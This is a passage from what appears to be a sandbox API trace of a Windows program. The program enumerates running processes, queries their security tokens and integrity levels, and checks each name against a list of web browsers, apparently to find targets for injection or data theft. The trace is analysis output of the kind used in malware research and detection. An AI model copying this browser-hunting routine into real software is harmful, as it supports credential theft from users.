dwProcessId=0x724) returned 0x548 [0226.862] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.862] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.862] GetLastError () returned 0x7a [0226.862] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.862] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.862] CloseHandle (hObject=0x340) returned 1 [0226.862] CloseHandle (hObject=0x548) returned 1 [0226.862] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0226.862] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x346d50, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.862] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.862] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.862] GetLastError () returned 0x7a [0226.862] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.862] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.862] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.862] CloseHandle (hObject=0x340) returned 1 [0226.862] CloseHandle (hObject=0x548) returned 1 [0226.862] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0226.862] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0226.862] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0226.862] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0226.862] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0226.862] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0226.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0226.862] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.862] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.862] GetLastError () returned 0x7a [0226.862] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.862] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.862] CloseHandle (hObject=0x340) returned 1 [0226.862] CloseHandle (hObject=0x548) returned 1 [0226.862] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0226.862] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x346e70, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.862] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.863] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.863] GetLastError () returned 0x7a [0226.863] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.863] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.863] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.863] CloseHandle (hObject=0x340) returned 1 [0226.863] CloseHandle (hObject=0x548) returned 1 [0226.863] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0226.863] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0226.863] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0226.863] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0226.863] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0226.863] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0226.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0226.863] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.863] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.863] GetLastError () returned 0x7a [0226.863] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.863] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.863] CloseHandle (hObject=0x340) returned 1 [0226.863] CloseHandle (hObject=0x548) returned 1 [0226.863] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0226.863] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x346fa8, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.863] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.863] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.863] GetLastError () returned 0x7a [0226.863] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.863] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.863] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.863] CloseHandle (hObject=0x340) returned 1 [0226.863] CloseHandle (hObject=0x548) returned 1 [0226.863] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0226.863] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0226.863] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0226.863] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0226.863] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0226.863] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0226.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0226.864] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.864] GetLastError () returned 0x7a [0226.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.864] CloseHandle (hObject=0x340) returned 1 [0226.864] CloseHandle (hObject=0x548) returned 1 [0226.864] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0226.864] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3470b8, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.864] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.864] GetLastError () returned 0x7a [0226.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.864] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.864] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.864] CloseHandle (hObject=0x340) returned 1 [0226.864] CloseHandle (hObject=0x548) returned 1 [0226.864] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0226.864] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0226.864] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0226.864] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0226.864] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0226.864] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0226.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0226.864] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.864] GetLastError () returned 0x7a [0226.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.864] CloseHandle (hObject=0x340) returned 1 [0226.864] CloseHandle (hObject=0x548) returned 1 [0226.864] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0226.864] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3471f0, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.864] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.864] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.864] GetLastError () returned 0x7a [0226.865] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.865] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.865] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.865] CloseHandle (hObject=0x340) returned 1 [0226.865] CloseHandle (hObject=0x548) returned 1 [0226.865] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0226.865] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0226.865] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0226.865] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0226.865] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0226.865] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0226.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0226.865] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.865] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.865] GetLastError () returned 0x7a [0226.865] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.865] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.865] CloseHandle (hObject=0x340) returned 1 [0226.865] CloseHandle (hObject=0x548) returned 1 [0226.865] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0226.865] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x347320, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.865] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.865] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.865] GetLastError () returned 0x7a [0226.865] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.865] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.865] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.865] CloseHandle (hObject=0x340) returned 1 [0226.865] CloseHandle (hObject=0x548) returned 1 [0226.865] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0226.865] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0226.865] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0226.865] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0226.865] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0226.865] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0226.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0226.865] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.865] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.865] GetLastError () returned 0x7a [0226.866] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.866] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.866] CloseHandle (hObject=0x340) returned 1 [0226.866] CloseHandle (hObject=0x548) returned 1 [0226.866] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0226.866] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x347460, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.866] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.866] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.866] GetLastError () returned 0x7a [0226.866] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.866] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.866] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.866] CloseHandle (hObject=0x340) returned 1 [0226.866] CloseHandle (hObject=0x548) returned 1 [0226.866] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0226.866] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0226.866] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0226.866] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0226.866] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0226.866] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0226.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0226.866] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.866] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.866] GetLastError () returned 0x7a [0226.866] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.866] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.866] CloseHandle (hObject=0x340) returned 1 [0226.866] CloseHandle (hObject=0x548) returned 1 [0226.866] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0226.866] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x347578, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: 